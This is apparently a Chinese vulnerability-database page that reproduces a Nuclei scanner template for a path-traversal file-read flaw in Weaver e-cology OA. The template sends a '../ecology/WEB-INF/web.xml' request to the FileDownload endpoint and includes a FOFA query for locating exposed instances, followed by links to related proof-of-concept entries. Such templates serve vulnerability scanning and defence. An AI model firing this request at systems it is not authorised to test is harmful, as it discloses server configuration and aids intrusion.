ecology-filedownload-directory-traversal: Ecology - Local File Inclusion

漏洞描述

PoC代码[已公开]

id: ecology-filedownload-directory-traversal

info:
  name: Ecology - Local File Inclusion
  author: princechaddha
  severity: high
  description: Ecology is vulnerable to local file inclusion.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
  tags: ecology,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<url-pattern>/weaver/"
        part: body
# digest: 4b0a00483046022100ad3ea451871cf4bba908e92f93edf3ce84f1fe675c1ceddcb4b5b012989d6f11022100e4236e6cebb6ef213f4da1c24b6fbd19a85a4daa1c1a60ba55180f6de5a820db:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• POC vtigercrm-exposed-directory: Vtiger CRM - Exposed Directory
• POC CVE-2025-31486: Vite server.fs.deny Bypass - Local File Inclusion
• POC gradio-lfi: Gradio - Local File Inclusion
• 泛微e-cology 前台SQL注入漏洞
• ecology-ebridge-addtaste-sqli: 泛微云桥 taste/addTaste SQL注入
• ecology-ifnewscheckoutbycurrentuser-dwr-sqli: 泛微 E-Cology ifnewscheckoutbycurrentuser.dwr SQL 注入
• ecology-ktreeuploadaction-upload: 泛微 e-cology 任意文件上传
• finereport-directory-traversal: Finereport Directory Traversal
• mapgis-cloud-manager-local-file-read: MapGis Cloud Manager Local File Read
• tpshop-directory-traversal: Tpshop Directory Traversal
• weiphp-path-traversal: Weiphp Path Traversal
• WordPress Business Directory 插件 /business-directory SQL 注入漏洞（CVE-2024-4443）
• POC CVE-2021-3156: Sudo Baron Samedit - Local Privilege Escalation